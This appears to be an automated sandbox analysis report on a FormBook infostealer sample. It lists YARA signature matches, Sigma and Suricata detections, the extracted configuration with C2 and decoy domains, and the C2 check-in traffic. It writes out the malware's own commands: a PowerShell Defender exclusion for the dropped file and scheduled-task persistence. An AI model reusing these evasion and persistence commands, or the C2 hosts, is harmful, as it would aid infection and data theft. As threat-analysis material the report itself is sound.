0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 890983726372673.exe PID: 3180	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 890983726372673.exe PID: 3180	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3e907:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: RegSvcs.exe PID: 7180	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x67e03:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: mZanCtInfW.exe PID: 7364	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: mZanCtInfW.exe PID: 7364	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x8c7:$a1: 3C 30 50 4F 53 54 74 09 40 0xb207:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 7452	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x194b72:$a1: 3C 30 50 4F 53 54 74 09 40 0x195cbc:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cc654:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: cmstp.exe PID: 7588	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x100663:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 43 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
9.2.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
9.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
9.2.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\890983726372673.exe", ParentImage: C:\Users\user\Desktop\890983726372673.exe, ParentProcessId: 3180, ParentProcessName: 890983726372673.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe", ProcessId: 6692, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpCC47.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpCC47.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mZanCtInfW.exe, ParentImage: C:\Users\user\AppData\Roaming\mZanCtInfW.exe, ParentProcessId: 7364, ParentProcessName: mZanCtInfW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpCC47.tmp", ProcessId: 7488, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\890983726372673.exe", ParentImage: C:\Users\user\Desktop\890983726372673.exe, ParentProcessId: 3180, ParentProcessName: 890983726372673.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp", ProcessId: 6380, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\890983726372673.exe", ParentImage: C:\Users\user\Desktop\890983726372673.exe, ParentProcessId: 3180, ParentProcessName: 890983726372673.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe", ProcessId: 6692, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\890983726372673.exe", ParentImage: C:\Users\user\Desktop\890983726372673.exe, ParentProcessId: 3180, ParentProcessName: 890983726372673.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp", ProcessId: 6380, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-20T15:40:51.145484+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.7	49896	154.23.184.218	80	TCP
2025-01-20T15:41:11.588672+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.7	49979	172.64.152.166	80	TCP
2025-01-20T15:41:31.874575+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.7	49980	172.67.218.190	80	TCP
2025-01-20T15:42:12.385738+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.7	49981	64.190.62.22	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.wck37.top/3nop/	Avira URL Cloud: Label: malware
Source: http://www.rentabay.shop/3nop/www.rtpradar138af.xyz	Avira URL Cloud: Label: malware
Source: http://www.wck37.top/3nop/?a48=OFQHFf_pCbOHr&FTKP9RO=GxIMk9N6s/C+rwPnY7VdspL6L+S7+ozO7CYhEWVr8heIpQjP62oRCeP/Ky1KzHgl60pUzr41ug==	Avira URL Cloud: Label: malware
Source: http://www.wck37.top/3nop/www.sculptify.today	Avira URL Cloud: Label: malware
Source: http://www.skillbeast.site/3nop/www.lghomes.net	Avira URL Cloud: Label: malware
Source: http://www.skillbeast.site/3nop/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.ok33r.shop/3nop/"], "decoy": ["subur88wap.sbs", "tyai1.top", "skillbeast.site", "kcclassiccars.net", "lghomes.net", "eijanno.cyou", "work-in-usa-60100.bond", "268chill.store", "bharatwin.biz", "cakjitu01.xyz", "misafert.xyz", "hiretemp.net", "lvekz-onearmed.top", "amanda-manopo.info", "seo-companies22.online", "casinowalletth.net", "maynrson.monster", "bewizi.com", "thedronetechhub.shop", "car-insurance-93947.bond", "javabits.net", "dzcodelab.xyz", "adeelrao.online", "amazing-cruise-pakages.today", "wftoutsource.services", "stormbeauty.online", "a8dz7m5.com", "875capehornrdjeffersonny.com", "odadesign.site", "reejunkremoval7.life", "g59q18eq.top", "wk0003.top", "rtpradar138af.xyz", "wnsyl11.vip", "nexilis.rest", "top-dubai-cruise-deals.today", "zoril.lol", "englishmaterials.net", "uzumluescortg.xyz", "dutchpay.net", "visprintdesign.biz", "kneepain661.shop", "xuq-smart-fridge-uj0.rest", "jam-nins.com", "rentabay.shop", "victoryvo2.info", "i2c2.tech", "wck37.top", "refrigerators-69792.bond", "abc1network.net", "amilia-do-gil.net", "806477628.xyz", "luxdrive.vip", "unika.lat", "sculptify.today", "winatwork.today", "onlinegamehub.online", "petnino.club", "amtrade.icu", "macular-degeneration-39252.bond", "argastipster.click", "1nvuti.fun", "beautifyaura.com", "savings-accounts-57645.bond"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: 890983726372673.exe	Virustotal: Detection: 65%			Perma Link
Source: 890983726372673.exe	ReversingLabs: Detection: 55%

Yara detected FormBook

Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 890983726372673.exe

Joe Sandbox ML: detected

Source: 890983726372673.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 890983726372673.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: explorer.pdbUGP source: RegSvcs.exe, 00000009.00000002.1386926023.0000000003580000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.2542142612.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmstp.pdbGCTL source: RegSvcs.exe, 00000010.00000002.1414949296.0000000001900000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1413925702.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1416845022.0000000000440000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: mxDW.pdb source: 890983726372673.exe, mZanCtInfW.exe.1.dr
Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 0000000A.00000002.2563131962.00000000110FF000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.2545155032.000000000355A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2547041429.000000000594F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.1385767165.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.1387476539.0000000005256000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2546100075.000000000559E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.1385550640.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2546100075.0000000005400000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1413475109.0000000004186000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1417327506.000000000468E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1417327506.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1415442413.000000000433C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mxDW.pdbSHA256Y source: 890983726372673.exe, mZanCtInfW.exe.1.dr
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.1385767165.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000D.00000003.1387476539.0000000005256000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2546100075.000000000559E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.1385550640.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2546100075.0000000005400000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1413475109.0000000004186000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1417327506.000000000468E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1417327506.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1415442413.000000000433C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmstp.pdb source: RegSvcs.exe, 00000010.00000002.1414949296.0000000001900000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1413925702.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1416845022.0000000000440000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: explorer.pdb source: RegSvcs.exe, 00000009.00000002.1386926023.0000000003580000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.2542142612.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 0000000A.00000002.2563131962.00000000110FF000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.2545155032.000000000355A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2547041429.000000000594F000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 4x nop then jmp 09870FECh	12_2_098708DB
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 4x nop then jmp 09870FECh	12_2_098708F6
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 4x nop then jmp 09870FECh	12_2_09870A5C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49896 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49896 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49896 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49981 -> 64.190.62.22:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49981 -> 64.190.62.22:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49981 -> 64.190.62.22:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49979 -> 172.64.152.166:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49979 -> 172.64.152.166:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49979 -> 172.64.152.166:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49980 -> 172.67.218.190:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49980 -> 172.67.218.190:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49980 -> 172.67.218.190:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 172.67.218.190 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.62.22 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.23.184.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.64.152.166 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.ok33r.shop/3nop/

Source: global traffic	HTTP traffic detected: GET /3nop/?a48=OFQHFf_pCbOHr&FTKP9RO=GxIMk9N6s/C+rwPnY7VdspL6L+S7+ozO7CYhEWVr8heIpQjP62oRCeP/Ky1KzHgl60pUzr41ug== HTTP/1.1Host: www.wck37.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /3nop/?FTKP9RO=M66h4je3ovKyUWAaK5O57MeYHHK7lRotWjmKhFqTDOzxCcvvXVYAODnRVemK99nrPpHCI+op6g==&a48=OFQHFf_pCbOHr HTTP/1.1Host: www.sculptify.todayConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /3nop/?a48=OFQHFf_pCbOHr&FTKP9RO=cAkIJP2yuHw8NftAxfapjk8pNfxd7WnrPmxhgashJ40FK6+kExzIylEouJNnBvp3xdez5OK6uQ== HTTP/1.1Host: www.amanda-manopo.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /3nop/?a48=OFQHFf_pCbOHr&FTKP9RO=waORSuD406+HYHIOPuVcRmVHWn53mrn5iKZ0f1EtpGdx00h7ZtzU/rwaR6jaArZiCQczcUZanQ== HTTP/1.1Host: www.xuq-smart-fridge-uj0.restConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 172.64.152.166 172.64.152.166
Source: Joe Sandbox View	IP Address: 64.190.62.22 64.190.62.22

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: NBS11696US NBS11696US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 10_2_1052DF82 getaddrinfo,setsockopt,recv,

10_2_1052DF82

Source: global traffic	HTTP traffic detected: GET /3nop/?a48=OFQHFf_pCbOHr&FTKP9RO=GxIMk9N6s/C+rwPnY7VdspL6L+S7+ozO7CYhEWVr8heIpQjP62oRCeP/Ky1KzHgl60pUzr41ug== HTTP/1.1Host: www.wck37.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /3nop/?FTKP9RO=M66h4je3ovKyUWAaK5O57MeYHHK7lRotWjmKhFqTDOzxCcvvXVYAODnRVemK99nrPpHCI+op6g==&a48=OFQHFf_pCbOHr HTTP/1.1Host: www.sculptify.todayConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /3nop/?a48=OFQHFf_pCbOHr&FTKP9RO=cAkIJP2yuHw8NftAxfapjk8pNfxd7WnrPmxhgashJ40FK6+kExzIylEouJNnBvp3xdez5OK6uQ== HTTP/1.1Host: www.amanda-manopo.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /3nop/?a48=OFQHFf_pCbOHr&FTKP9RO=waORSuD406+HYHIOPuVcRmVHWn53mrn5iKZ0f1EtpGdx00h7ZtzU/rwaR6jaArZiCQczcUZanQ== HTTP/1.1Host: www.xuq-smart-fridge-uj0.restConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.wck37.top
Source: global traffic	DNS traffic detected: DNS query: www.sculptify.today
Source: global traffic	DNS traffic detected: DNS query: www.amanda-manopo.info
Source: global traffic	DNS traffic detected: DNS query: www.thedronetechhub.shop
Source: global traffic	DNS traffic detected: DNS query: www.xuq-smart-fridge-uj0.rest
Source: global traffic	DNS traffic detected: DNS query: www.amtrade.icu

Source: explorer.exe, 0000000A.00000000.1320841185.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2551526353.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279552039.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1326522218.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000000A.00000000.1320841185.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2551526353.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279552039.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1326522218.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
